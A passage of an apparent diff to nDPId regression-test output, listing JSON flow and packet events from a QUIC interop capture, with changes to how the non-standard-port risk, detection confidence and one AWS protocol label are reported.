ZprtTphxJOpWh9iC60eXUS92cRfpPE4t2QsqYFBWlVb+13SoAgtAjkrTvvSLYg\/D9UbwBgPzj7R4p4Cd+bbadGFWvc8wcjuV9E+a+X5gFeHhOOh92iUHSpTT\/SzNsRBUS9i7htX+D9DZZfG6yrrqJwDVKCG3skrDDAnAOEIj5wc9E6ktIWj727nJPaG4F\/yFeB9mvF4BGMSF2t1HX1v3Uf8fd+2\/CrVkIpM1QnAbm2kykvcJlPK0VaRsZgQsar09\/xE1coUXATF0tDX6QEFU7xe84fN1PUk1FXFUXQjOBwq0tYTTcPCN4qGKSXtiP22FkC3\/OV2TW+6RsyY4afHoIc55iP9uTyiDz8GgsOMMcDAt86zjUpsGFleM3dlpIjA5SRInS88gDuKFXQazWcKMDZGgZ5OzzGPWiaCCElrFoU6Z0C9Z3M3gT5NV2VJc1gEss3QWIiObA5nJk+9Egjbcm3dvzdusN6QEHoBwehHTuwg2LVAOrhrdwgJHwD24nAbkGvZS6207+R+dDWgjErFMPgJjQk90HJrSxW3PVzyhqFF8r1HhvahtRcrGLHjwGBKNWw\/mrkVazrYWToNHELFQGA97zWhxG8ZSHR+27fKaBvWg5SNzSWU2wqAon3FV4zTetTXEb9zkLHsi2S8+hrVzPvDpUzxu5LCvszrotwPRcXWgIMpfFuHdDkZxnUc45aPM4oNaKzuB\/0K41UWRnLrJN6\/+98eIMaltlc4V06CpAS5gYRWr9oVtc+QkkWRldnz37SdoLKl8j4QpdxDKnGiBhtH2t7EGBZvilk2\/E0n1dYaPhlbDUz8OHPLZKVRSX+2OC6kXAYMmbeaPeYmlTGxdw7MpypCb0e78htplM7XmCygTm7xO55EtSdHoQEqVVTNOIIkzaRk0or7ix1b+Ac9bulavsll9eLerk9aXIedIpmtLAhpid4yPMzOfK14JMJmXBfXb5Bmo\/4e2X5MhFs1h6MDiN0sF8lsZJljJ9S5QgvPFUHTbEgZwtOqgzvOm6MsHiV4dCQU3zeds93rktywyH+Qpw1nOVbV0RHa72zd0Io5tIKuEbGJ4DvYBtvaNEL2GzNcfpg1SNHmTLW9FsceE8YJg9q1N4VFcd0DPFy5W443yNter3ub6Z+8DDshzGfLalC9+Gxtga2a8QCpuk8EpMk+hYjiHRQMcz0FVALld4YdzH4Q7aHFNufiFtsQORs2elcXiDr+suYZd\/KbghskPHXcWBEvZ87I+FVy0zTnkd6sN9nVlJxmggfsaoPYeNUdCjf4aj8XSdzugsx\/gjaDcmur3C2vSPf7TTH0vuXm+WJUiYbW8mepVZGo\/Ab4kEw9z6H9LiIvVjV2bJog+FgNpi+bCuPZrXaL1QVg16ASOkMyJEOBJ\/ApwZq1c+0SVVETGYjpibsmHYU2g=="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1603816434648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVWdAAEARtqvAqAGAEr1U9YhXAbsE7B\/jxQoKCgoI8ujrluq3MPgAAETSSw3nndZy2B\/JR\/aFheBm1Am1dhHdGKFX4rQi398jOJ+Jn+ueiHb2+ayhrixzGiiTN9ufhk4Lx76CWjuYMe1esceEF2U0qEsZzm5HKOUSMwSJ5RaG7eBb\/NGtId7Q6oJPV32C4GXJOjD2zUmbaepzk+oaGFaN7rBeaveWtYLwkm3MCtZ9ixGvt1GVcZjsd3UxnGM0OVZjCX0r80DcWyuTZ+venG\/PF8dpMDihqsZpbR3kCGTkK2uMnVKt5rsbq8Q3DZ4G5gYRlETl0tKNNk\/HmutyUjflzkkuvzr4zZfbMn0fPfDD0j7mcNxEYvvd0jng9gG7f2g5c2cWdEOeL32TJuGaUD4LxEgTmtQ74vLlqJ2jtPbB5cHftJfgjUFjPeNm\/TPJhWl+3\/2FaFh7UtvKIQZYWOKggBRpbC9DfYZGBlcBdT4cVCcoYVYvdnofibyJj7qvtk9aBhQ8X8haBJHnwUiu9Fh6LP38l6DOudy0wo3ZglGsYmVQyJ13TOTkHezaV+ftjH2Ic2\/kdq8i3gBc5XmSKkmTiDbR3CJC6bVKLX4YKbycr7PwvmeAgaIww6YUv5UVh+vhnxqslyCYJ54KMPJqDqUt8WhJ8Cyji43HCRRNG5kipptq8jUrAU8gnwzNfotH5yFDF+SAJ3QrzY\/5UXiv\/luWN+jwEASOuxa49aAiqVUa6A2J9z+IULgzW9aUufnh8e6ojNPCROl0NOCqRnl5cZCiCryKj\/+UTBEx39zm8tG1rMtKw8QCLVg0thBdHS0CguNqIcZrFjoob99Ht9nweYVHyIifEGHrneZFx6IaFg2N2+vqZttN1BPnlJwB5SkjsSGnctAq0WWDJg53X0egLh7DxbpeFvo\/PmlH\/qw8mjFt+NYPN0Ckt589t68fWjAbTRqz6xR6iPzgtt26G5g9GSc+owtcPOoKDSY+FtfvQEy2FDAKor8oRuyToRIFoS3GHrsVAzOLHHMrzcmpnrq0hajchpZRX9\/japhKPdmJTqsBb+ql5oZkXtBdENW3VUtixBzrUWiVbOkyqYBTjYwbASaX1s4B0v9Dw3fdaQktg0huYIDe3RIztuWGLVXFqL3kiPstObyRA8wmGdfn5WqodpZ8U9Vfz6QFfvCBcYE1\/TFuOxsVuCGHj1fKdzqDxFgpT\/6zI3IgHHNl0RstA3RkolWL6H0I5f1KqOUjo7bKGh\/fgABUsvMtkL2jljWloerb\/OyZ8cMJbX4NbVoNGdWP6RjJXhmtbLlmGjr\/nG9lw0JPerfXWXztQQ84uR0ZUAsCJbt6PCEcektnL94QlE49op9jLT5v5WzhOshdDsHI9kPLgiBlXhxtuB\/4fh64dFKwIV\/bkeadS+6vx09Jc7DjJDplds16bxuhHniXD1+VLQYqMNvLfkmfXTcvt+DCDI5+MtT64WEYlvBN\/oRfvKNXOlpG0nbSIxax56Y8i7ywQwgVXRD\/tgIY5hSIvokl8C2Vtnw0ocpu1kRHmBam5VO2gvUlslhf1v2Z1lhZ3ZHKYC+go+hJTIN8eMiQlcB94ueuvx1ZXgPZAWpEgcGBa59R7aGipRkAIOU7VFYiFm+JgHn0wlJi1ePUMn2SyyfRo+5s5CeNkA7rfixGxD37LoDcJtDM1uCusOgWzzaoPX\/WMg=="}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1603816434650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"ts_msec":1603816434650,"pkt":"PKn0qB\/spJGxgjQ5ht1gDoRdACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVHuNwArYcCQAAAAAAAIF6TDw+yG4BdFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="}
 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1603816434652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434652,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVD8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWsxwRUQTYTRjACgoKCgjaL32MZj\/FsgAARL5kzfCcIzgmsxjP0G4DqL4uwGMN6uFXlzXIqULUmbWkTZimqkIWYk5J+U1Tm2aqd1MjW9rzMqELFmlAhlXckjXGsH+Agbi5yNw7OuSd0A2jkDOUIsWCSOJHKlMr0ObsMh5yal2tl2VuEVfSE0qsFV7WLAeEJZABZmjJDxwfk918siEfP+aSaQvEgBBkJ84hGcxa0pyg3zr9AdvoDzmITNfcVD\/SbxorVKGQTTyoV2KjJ4ODNMmCAzaGCyDD6BHN+TqaVnIG75iUky\/i00OWO2itqTOK5MK0gg\/F4dmZXxYm544SXt3mEIMn\/KiT58TB8AnvvoMM+zDcLjD2voYO7w6nQ7vjIZtfT9m3XWOP8J9F0bvPBS9+vGZTprqiR2e6PBnSg0KmchSjlKU1RP+jKuqXA5YZOjOGqV6O\/fewKbV40io0i1J+NIHqJBZhd5bjjAjtEL0\/jGHCJT8+kHWQVRnVxvJTULFHfSoFaOv0\/FAPPgQmAsV\/e7ePRse7PiP7AO9qzUpNTBIaRi7R7yEx60bIoFeYOSNhxPoca1fCTIiqpbf\/Lysq6HvKKUzNT0W7O4lfkb\/ZC1VhUlt7Od+qJCiRwXxU9D\/42IwUin8sjlUvg+KRX5ulSQOPGOYufZ92sil2AWQyHIIFULLz407V9+RW+9E6Q7FjwFkZOFtY3aV1T\/8FTKaaOHGLazcJjKUaGZC8AA2F6I9PGcFFC9RAXizVtqzUQ+iviDhJ+goUzdUB1agAa\/MIn7DGkbkQVOtD+1M6CKkE7hHdmiQ9n16NW3fCjz4YqlEqNM80RgogewW7AOxtVLzwj56n0cG2wRWB+HawQfkQIDtIJqSHPWB9OkV6tfXkJfbT2wlbh\/rfKSskLrk1sbYzY1PIDNmPjLRCZBVWmCYLPffYkG+b4MwNHB\/vAIrvElJ1puJF7jpzzegk3uRCXIKeAvnSIueoT+dVtLnf0DjT1SjmwFUtovRpxxTHtgK78PEBaNK+CFnXBiyxXF88QJhaPeav6oIj92LBjRUaBtpFYrGT7ukwX0CZJH6ss8DKRBYG8o1LXxAiSMdCM85xU\/D1l5JAQtiGzlNDH3qXy62dPdPRzmBTdsEvCTu1SJ4aTQ5HqZkZ8mdXkv1vSCrhXtjNjyM9ISkMXQl7Fv4snypY5dWEXtwWFf\/DXWrXLzy8bkZnUz7iRb5Ma6ol5Xky3YnWYit6Oy8bYeuXHVcQl7yxHmQFX9vlhcsmh3du6Au3WEc7fVr5+pChwI9eXXokYUBC373Pa\/y2+Tfslyg9\/dYBdfu3HiD4BKHBgCptEzxjJJoRocgeQEgIyTxnLazyy7tsTNsUIYjWNFhWoL2xJFntqowob7P44+WFAm6ZkZovEYYNmSKqBxSG9wAPXekCbXtH\/b+TOIK9+1XfTT1IrbkxQYHWASoekr6WZeU4jYlWrrn8X8ujjTBW3jswDbT7J2Z+rUudTp2RtVzFLtpsMRieCSQBEact92jCCupbg43ThfRz5r1sA\/97BYUtprJqYvONm9iufuMRRuGLpd5h9EBpE9lEEKcLT0QIsIjALGWNfhWnZdIJLXqAQgypProR3AsmTwuLfn7lEfngyfzJ6wUdezbTEtlDAdR3wg=="}
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1603816434656,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434656,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgNAAEARiNrAqAGAhfLO9LMfEVIE7Eh3wgoKCgoIJ05Q063kdsUAAETSbLaK1YIdjfFKFulEh8Y2sf\/rINJYpnSz+n\/2QdD9ZhLptcSvy2R2VY8k3My6fIvL6mAk+uMpn4smDS1KptYa2flod7AFdpBN3VvGtMn8LYTKEkOwUsRO7TdqEPawLRWOABxPUqjQjdCeFgLJNdZk5RA07LTgVWI2Yu12LDx4casOusyaOV0FFb2psXZWvD\/rRGJTjSUwimMA87gUlPjAdz\/gfYKA8J81JCdeNyPB5kQpQZK9Ag3U\/SNi8mmglOJkOcsW2kP9tVz80xUx+vHEMYcRJEAektIaWVqW\/qsi2o67TUfHR2EXa8XSNf6EPfTjaOmRYh3mFcNDcJgd2kz2KAnh3V0gkKSqu2uEJA5\/mg\/TnJn0\/l1UAulF72+p5R9Pa32JoZ5rRGN1BakDzPrffOR0TvFE3y\/+FghM6Dz\/8uzCybhNc7sfFp+p4ZUoUBdN3i5d0NPyFY2gHyQomOn9rjU73nYYIseeZ+nhRO7YbCjkbUB\/yYwkJmFOh0TvqwzYznQgk7lfr\/md+bsxGFCUVM4aVxtYqCyilzNHjx2\/0uQ9PwLviLCGbf\/DMQiUcVNp3cYBqz7DJUy+OlRTk8hlbBxWecwj0pbXbnMQduOagYXqgiomaGUVKDGlda0JCfvvNO757eKuRy0mLdjIpqHD1NEufFqbaSMZUn9grkimQ69ppIErnAUuDQMJRIyzqNcJHugVGEq5oP7QdlfZ7lr3jOBT7HkZcNEd8AV47qJgoKU5q4NGc0J71Pw2YVYd1scb3A1vWRIVsIkczT7yuDAKiAClVSuNQLnIvJw4l6s7CUlk6S8uK69+4Ltr75BolBxMCVoHkM5b\/orqVfR0OqNi+hCYxsYJghq7xN9bXvYCpq2kqvymjFiL1hosZ8LqBqlbZ+KRpjwV61KCcoVqNasJru7kBOCt\/mWTssvQAORaUq8Mlwn9y2PykyJGeVKaSASOiRacPdV4HuhCOQcDfRB9yNMfMAnpvVeDH6VS7MdAdMQe93Qrtp1QeP8VO2rTCCN91AOit2V+QXCvc+BbYXTvvH3JkKThYqcH8rRbxqdDTPq\/wWim7\/0lqkWBCggizFSqTrUIDXVpjQPuUhy\/WRzxkYSIc7u5fZ6sIq5eN5m9fXx2vD43Yq+l1Ghb4xvwIneJ5NUn2eFk1R6ttVwWQjusN7oyMgG5gj6hjohBbMiM6VLvBdJqqabe+fqfPuIkbGqi\/pSgVmd7J7gTSQs7\/paaiImg8sm4Mq97uvoFIBYp8yYjmKJB82W7bOZiqV49vTn0RrZTlVVPlHFQX2WpjZTpwwz0jIKKplJsVkyi1FG+BOFx+GyxlIihWz4PLKtSgOENeMXtz0\/b7SoSYOWhsCG2\/\/f948c1r4PeUvRu7XqduuojNmHxpahHKwAwVmNhkRHsAbP5zW9qP6XfWnsVWmx0bN7aP5npP3hrOKyfrsV\/5FkNliWd9jR5UNuOo4OtgXCghNfW4LyOPBq4jsogY2TorxYEYK\/ICauhkE1t2zAYwcvA9jNm0x1R4D\/Sm+97z\/rPAGHRZcrG9A3EB6U09uwydYieU6kZpUiZJOYWACk9HUxtfhKSNARDjWcNCzM7bpArmDYB3hnejZrmrPbFxj58+oKmg6IVgKVFjNIQGjV1OHopPg=="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603816434657,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434657,"pkt":"pJGxgjQ5PKn0qB\/sht1gCNHwBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYQzDKCgoKCgjBjvWe+MPFRAAARL4g348kA8mQBcAOi\/Ea5lVgGbx\/7eo9z03nW8pQoHBEiVFxap\/J7yF0T4ETOiXRrEVFzfKu4cp9\/aIHD8VuqdmnRI7ZUzH6nHP6t6XgWjPLu9gwncGiNpy\/62Nk4XPzeji4OQEhiV2wvPwilhPjz1Iw8tA6gxIE\/FJ4VwrM+jhjDDGeJX9BSVBF51kNOZwIfVwErkoa\/qCvtHlDAlGsd67naWgwRHPQ1nkSJwo+9sQMQloIehnYy66qr7McaNefwAbFS5vujjFD0bYEmGDHKA\/F\/y+3qGlJupB5YPSp8wB7Am1v5JD+D\/bG5B5luaL\/5MF\/tQnBG2dxtea8LZG5G\/eV6LyP9L4ooo4IJyvTlEaQ\/ZOeKwlHxchtWnc9B1fL75AWTflk927t027mF4gEUpMwkx4RQMESzJeKbiKyR6Kju8+GylIujiTUOWwe8Pt6FKBiAZLgvlK4YR6upjyxAj1yifEMXI9ck\/VO\/Ck0PU3TrRtvDl\/wfNsVtESwzsMNhYfkwDEb9HKwo5a2\/kMDB2oZkX2VNVeOAH0n3s8tB9WLVe8oKkFTUmog+0QRsMIpnLCWQ75LQKoJv6O1XJQVMkvkriwokuRy8CCP4EpIlVSvXuFArfX\/fbTPCluQ1NH50zOP6ysMQboAYq5P1UCN4zcLGWZaVbF9oa1jAJ6PadCu1EtWpxyNeTUpAe5jtCvh1Ek99dEg6bQ+j6gvn\/Yz8AhHWVisS\/4VPgx2sHYS2FDc4ug9W6gsAFExY3uSitd7XjxK\/bL1oNU+b0jZOhnX4xE5mnhbxzHNAKXSXB2aWDY3+BQWmASrCC3UyA8\/hE91TFVnfAmnegiopiURKjvi8DWlsXJi98UivPepk1KIUkyuwYljhDbFg+Ju8PdCQIp1RdqDT1rPQsla4QcsyF\/NLkn03\/oiCiTPViBgeLpx5IDNsz\/E5PKe7HtjsCqTGdF3JcVQGRMcs6XuK6eeXR39paD1+Ap5R7y4jtTYGF3ERVJnfLPi0OImMpLV78BBWUIiuk57yx\/ByVw1Vi231q0R5hJu+2UkRPleoRsn22QwOy5Wyt6YCa9Njzu+jmkM5SaTLiDskQIXBb6CNyIxDTqisRatDtzI4tGgpDJJrJLyZRRjwm4IUGl4MEcnCWz9P+nJkKiW91BFFECvItcE6tRgENAP6B07ROBWB4xJBDVhnX0WgQS8bETOrbEby5WFiD92Zha2iJfBanxLrhkMlyxfJQvY++OklEMvIXt3v8l2q3dZWFOn4kyWKCN09iij0w0AEDsYLWJZuX4Wd4BeQXUc0TQSuDLkBeoncn1cOIA9nbBX5JYvyr8xLwXYv1YbXFHRI\/Z6kEVdG+BSe850euHBVqJOat4IdCKJnu6NuFXRzdJnMp9gCv2PvmYfbsW9v5iJpCEm0G5joiY+1mWnVbfZAO5JyrBGv3ibTwQYFw\/SIY85UIif3wl0VVblUQH81ysGAOBc9Qkl\/ZLs9Nmdqg326DSTscTecRmY2x8\/F6T2e\/IU6BMaPO19yi\/FICyG9IeO7SjydAWQ627DK5c9b4kcDrf56O+pK9aBvIiTOBgdfw7wCNgDwIOMnK6gKccj4qLA25Wlz7z4n6yBivDMYJeK5g=="}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
